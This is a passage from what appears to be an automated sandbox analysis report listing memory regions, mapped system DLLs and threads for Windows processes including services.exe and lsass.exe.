0x280000 region_type = mapped_file name = "aero_unavail.cur" filename = "\\Windows\\Cursors\\aero_unavail.cur" (normalized: "c:\\windows\\cursors\\aero_unavail.cur") Region: id = 38543 start_va = 0x5f0000 end_va = 0x62dfff entry_point = 0x5f0000 region_type = mapped_file name = "aero_working.ani" filename = "\\Windows\\Cursors\\aero_working.ani" (normalized: "c:\\windows\\cursors\\aero_working.ani") Region: id = 38544 start_va = 0x280000 end_va = 0x283fff entry_point = 0x280000 region_type = mapped_file name = "aero_helpsel.cur" filename = "\\Windows\\Cursors\\aero_helpsel.cur" (normalized: "c:\\windows\\cursors\\aero_helpsel.cur") Region: id = 38545 start_va = 0x280000 end_va = 0x283fff entry_point = 0x280000 region_type = mapped_file name = "aero_pen.cur" filename = "\\Windows\\Cursors\\aero_pen.cur" (normalized: "c:\\windows\\cursors\\aero_pen.cur") Region: id = 38546 start_va = 0x280000 end_va = 0x283fff entry_point = 0x280000 region_type = mapped_file name = "aero_link.cur" filename = "\\Windows\\Cursors\\aero_link.cur" (normalized: "c:\\windows\\cursors\\aero_link.cur") Region: id = 38550 start_va = 0xe70000 end_va = 0xf4efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e70000" filename = "" Region: id = 38551 start_va = 0x1f10000 end_va = 0x213ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f10000" filename = "" Region: id = 38552 start_va = 0x73f40000 end_va = 0x73f49fff entry_point = 0x73f40000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 38553 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 38554 start_va = 0x72a80000 end_va = 0x72a91fff entry_point = 0x72a80000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 38559 
start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 38560 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 38561 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 38562 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Thread: id = 1045 os_tid = 0x188 Thread: id = 1047 os_tid = 0x1a0 Thread: id = 1048 os_tid = 0x1a4 Thread: id = 1116 os_tid = 0x2cc Thread: id = 1140 os_tid = 0x334 Thread: id = 1195 os_tid = 0x418 Thread: id = 1196 os_tid = 0x420 Thread: id = 1201 os_tid = 0x430 Process: id = "667" image_name = "services.exe" filename = "c:\\windows\\system32\\services.exe" page_root = "0x7f1d1080" os_pid = "0x1c0" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "664" os_parent_pid = "0x160" cmd_line = "C:\\Windows\\system32\\services.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 36798 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 36799 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 36800 start_va = 0x1b0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 36801 start_va = 0xc00000 end_va = 0xc40fff entry_point = 0xc00000 region_type = mapped_file name = "services.exe" filename = "\\Windows\\System32\\services.exe" (normalized: 
"c:\\windows\\system32\\services.exe") Region: id = 36802 start_va = 0x77b00000 end_va = 0x77c3bfff entry_point = 0x77b00000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 36803 start_va = 0x77d40000 end_va = 0x77d40fff entry_point = 0x77d40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 36804 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 36805 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 36806 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 36808 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 36850 start_va = 0x1f0000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 36851 start_va = 0x77990000 end_va = 0x77a63fff entry_point = 0x77990000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 36852 start_va = 0x75eb0000 end_va = 0x75ef9fff entry_point = 0x75eb0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 36853 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 36854 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 36855 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 36856 start_va = 0x75f50000 end_va = 0x75ffbfff entry_point = 0x75f50000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 36857 start_va = 0x77c80000 end_va = 0x77d20fff entry_point = 0x77c80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 36858 start_va = 0x75b80000 end_va = 0x75b9afff entry_point = 0x75b80000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 36859 start_va = 0x75c50000 end_va = 0x75c5afff entry_point = 0x75c50000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 36860 start_va = 0x77c40000 end_va = 0x77c58fff entry_point = 0x77c40000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 36861 start_va = 0x75ba0000 end_va = 0x75babfff entry_point = 0x75ba0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 36862 start_va = 0xc0000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 36863 start_va = 0x75b70000 end_va = 0x75b7efff entry_point = 0x75b70000 region_type = mapped_file name = "scext.dll" filename = "\\Windows\\System32\\scext.dll" (normalized: 
"c:\\windows\\system32\\scext.dll") Region: id = 36885 start_va = 0x77780000 end_va = 0x77848fff entry_point = 0x77780000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 36886 start_va = 0x77160000 end_va = 0x771adfff entry_point = 0x77160000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 36887 start_va = 0x77c60000 end_va = 0x77c69fff entry_point = 0x77c60000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 36888 start_va = 0x77210000 end_va = 0x772acfff entry_point = 0x77210000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 36889 start_va = 0x75b30000 end_va = 0x75b37fff entry_point = 0x75b30000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 36890 start_va = 0x75ae0000 end_va = 0x75b2dfff entry_point = 0x75ae0000 region_type = mapped_file name = "scesrv.dll" filename = "\\Windows\\System32\\scesrv.dll" (normalized: "c:\\windows\\system32\\scesrv.dll") Region: id = 37029 start_va = 0x753c0000 end_va = 0x753d8fff entry_point = 0x753c0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 37030 start_va = 0xc0000 end_va = 0xdcfff entry_point = 0xc0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 37031 start_va = 0x140000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 37032 
start_va = 0x380000 end_va = 0x447fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 37033 start_va = 0xc0000 end_va = 0xdcfff entry_point = 0xc0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 37034 start_va = 0x77100000 end_va = 0x7711efff entry_point = 0x77100000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 37035 start_va = 0x763d0000 end_va = 0x7649bfff entry_point = 0x763d0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 37036 start_va = 0xc0000 end_va = 0x13ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 37037 start_va = 0x450000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 37038 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 37039 start_va = 0x150000 end_va = 0x151fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 37040 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 37041 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 37042 start_va = 0x560000 end_va = 0x952fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 37043 start_va = 0x960000 end_va = 0xafffff entry_point = 0x0 region_type = private name = 
"private_0x0000000000960000" filename = "" Region: id = 37049 start_va = 0x180000 end_va = 0x18cfff entry_point = 0x180000 region_type = mapped_file name = "tsusbflt.sys" filename = "\\Windows\\System32\\drivers\\TsUsbFlt.sys" (normalized: "c:\\windows\\system32\\drivers\\tsusbflt.sys") Region: id = 37050 start_va = 0x190000 end_va = 0x190fff entry_point = 0x190000 region_type = mapped_file name = "tsusbflt.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\tsusbflt.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\tsusbflt.sys.mui") Region: id = 37051 start_va = 0x230000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 37052 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 37053 start_va = 0xb80000 end_va = 0xbbffff entry_point = 0x0 region_type = private name = "private_0x0000000000b80000" filename = "" Region: id = 37054 start_va = 0x75c40000 end_va = 0x75c4dfff entry_point = 0x75c40000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 37055 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 37056 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 37057 start_va = 0x75740000 end_va = 0x75755fff entry_point = 0x75740000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 37058 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 37059 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 
region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 37060 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 37061 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 37062 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 37063 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 37064 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 37065 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 37066 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 37067 start_va = 0x753e0000 end_va = 0x753e7fff entry_point = 0x753e0000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 37068 start_va = 0x758b0000 end_va = 0x758cafff entry_point = 0x758b0000 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 37069 start_va = 0x180000 end_va = 0x184fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 37071 start_va = 0x75390000 end_va = 0x753bbfff entry_point = 0x75390000 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 37072 start_va = 0xc70000 end_va = 0xcaffff 
entry_point = 0x0 region_type = private name = "private_0x0000000000c70000" filename = "" Region: id = 37073 start_va = 0xcb0000 end_va = 0xe2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000cb0000" filename = "" Region: id = 37074 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 37075 start_va = 0x76000000 end_va = 0x7609ffff entry_point = 0x76000000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 37076 start_va = 0x190000 end_va = 0x190fff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 37077 start_va = 0x9f0000 end_va = 0xa2ffff entry_point = 0x0 region_type = private name = "private_0x00000000009f0000" filename = "" Region: id = 37078 start_va = 0xac0000 end_va = 0xafffff entry_point = 0x0 region_type = private name = "private_0x0000000000ac0000" filename = "" Region: id = 37079 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 37080 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 37081 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 37082 start_va = 0xb00000 end_va = 0xb3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b00000" filename = "" Region: id = 37083 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 37088 start_va = 0xa70000 end_va = 0xaaffff entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 37089 start_va = 0x7ffd7000 
end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 37090 start_va = 0xd20000 end_va = 0xd5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d20000" filename = "" Region: id = 37091 start_va = 0xdf0000 end_va = 0xe2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000df0000" filename = "" Region: id = 37092 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 37093 start_va = 0xea0000 end_va = 0xedffff entry_point = 0x0 region_type = private name = "private_0x0000000000ea0000" filename = "" Region: id = 37094 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 37095 start_va = 0xdb0000 end_va = 0xdeffff entry_point = 0x0 region_type = private name = "private_0x0000000000db0000" filename = "" Region: id = 37096 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 37097 start_va = 0xbc0000 end_va = 0xbfffff entry_point = 0x0 region_type = private name = "private_0x0000000000bc0000" filename = "" Region: id = 37098 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 37200 start_va = 0xf20000 end_va = 0xf5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f20000" filename = "" Region: id = 37201 start_va = 0x7ffaf000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ffaf000" filename = "" Region: id = 38745 start_va = 0xfd0000 end_va = 0x100ffff entry_point = 0x0 region_type = private name = "private_0x0000000000fd0000" filename = "" Region: id = 38746 start_va = 0x7ffae000 end_va = 0x7ffaefff entry_point = 0x0 region_type = private 
name = "private_0x000000007ffae000" filename = "" Region: id = 38864 start_va = 0x74600000 end_va = 0x7460cfff entry_point = 0x74600000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 38865 start_va = 0x75c10000 end_va = 0x75c38fff entry_point = 0x75c10000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Thread: id = 1058 os_tid = 0x1c4 Thread: id = 1073 os_tid = 0x210 Thread: id = 1074 os_tid = 0x214 Thread: id = 1075 os_tid = 0x218 Thread: id = 1076 os_tid = 0x21c Thread: id = 1077 os_tid = 0x220 Thread: id = 1078 os_tid = 0x224 Thread: id = 1079 os_tid = 0x228 Thread: id = 1080 os_tid = 0x22c Thread: id = 1081 os_tid = 0x230 Thread: id = 1082 os_tid = 0x234 Thread: id = 1083 os_tid = 0x238 Thread: id = 1097 os_tid = 0x274 Thread: id = 1197 os_tid = 0x41c Process: id = "668" image_name = "lsass.exe" filename = "c:\\windows\\system32\\lsass.exe" page_root = "0x7f1d10e0" os_pid = "0x1d0" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "664" os_parent_pid = "0x160" cmd_line = "C:\\Windows\\system32\\lsass.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 36809 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 36810 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 36811 start_va = 0x150000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 36812 start_va = 0x2c0000 end_va = 0x2c8fff entry_point = 0x2c0000 
region_type = mapped_file name = "lsass.exe" filename = "\\Windows\\System32\\lsass.exe" (normalized: "c:\\windows\\system32\\lsass.exe") Region: id = 36813 start_va = 0x77b00000 end_va = 0x77c3bfff entry_point = 0x77b00000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 36814 start_va = 0x77d40000 end_va = 0x77d40fff entry_point = 0x77d40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 36815 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 36816 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 36817 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 36819 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 36864 start_va = 0x2d0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 36865 start_va = 0x77990000 end_va = 0x77a63fff entry_point = 0x77990000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 36866 start_va = 0x75eb0000 end_va = 0x75ef9fff entry_point = 0x75eb0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 36867 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" 
Region: id = 36868 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 36869 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 36870 start_va = 0x75f50000 end_va = 0x75ffbfff entry_point = 0x75f50000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 36871 start_va = 0x77c80000 end_va = 0x77d20fff entry_point = 0x77c80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 36872 start_va = 0x75b60000 end_va = 0x75b66fff entry_point = 0x75b60000 region_type = mapped_file name = "sspisrv.dll" filename = "\\Windows\\System32\\sspisrv.dll" (normalized: "c:\\windows\\system32\\sspisrv.dll") Region: id = 36891 start_va = 0xc0000 end_va = 0x11ffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 36892 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 36893 start_va = 0x370000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 36894 start_va = 0x3f0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 36895 start_va = 0x759e0000 end_va = 0x75adffff entry_point = 0x759e0000 region_type = mapped_file name = "lsasrv.dll" filename = "\\Windows\\System32\\lsasrv.dll" (normalized: "c:\\windows\\system32\\lsasrv.dll") Region: id = 36896 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = 
"private_0x000000007ffdd000" filename = "" Region: id = 36897 start_va = 0x77c40000 end_va = 0x77c58fff entry_point = 0x77c40000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 36898 start_va = 0x75b80000 end_va = 0x75b9afff entry_point = 0x75b80000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 36899 start_va = 0x76000000 end_va = 0x7609ffff entry_point = 0x76000000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 36900 start_va = 0x77780000 end_va = 0x77848fff entry_point = 0x77780000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 36901 start_va = 0x77160000 end_va = 0x771adfff entry_point = 0x77160000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 36902 start_va = 0x77c60000 end_va = 0x77c69fff entry_point = 0x77c60000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 36903 start_va = 0x77210000 end_va = 0x772acfff entry_point = 0x77210000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 36904 start_va = 0x75950000 end_va = 0x759dafff entry_point = 0x75950000 region_type = mapped_file name = "samsrv.dll" filename = "\\Windows\\System32\\samsrv.dll" (normalized: "c:\\windows\\system32\\samsrv.dll") Region: id = 36905 start_va = 0x75930000 end_va = 0x75940fff entry_point = 0x75930000 region_type = mapped_file name = "cryptdll.dll" filename 
= "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 36906 start_va = 0x75cc0000 end_va = 0x75ccbfff entry_point = 0x75cc0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 36907 start_va = 0x758e0000 end_va = 0x75921fff entry_point = 0x758e0000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 36908 start_va = 0xc0000 end_va = 0xdcfff entry_point = 0xc0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 36909 start_va = 0x110000 end_va = 0x11ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 36910 start_va = 0x190000 end_va = 0x257fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 36911 start_va = 0xc0000 end_va = 0xdcfff entry_point = 0xc0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 36912 start_va = 0x77100000 end_va = 0x7711efff entry_point = 0x77100000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 36913 start_va = 0x763d0000 end_va = 0x7649bfff entry_point = 0x763d0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 36919 start_va = 0x2d0000 end_va = 0x34ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 36920 start_va = 0x4f0000 end_va = 0x5f0fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000004f0000" filename = "" Region: id = 36921 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 36922 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 36923 start_va = 0xe0000 end_va = 0xeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 36924 start_va = 0x720000 end_va = 0x75ffff entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 36925 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 36926 start_va = 0x600000 end_va = 0x700fff entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 36927 start_va = 0x600000 end_va = 0x700fff entry_point = 0x0 region_type = private name = 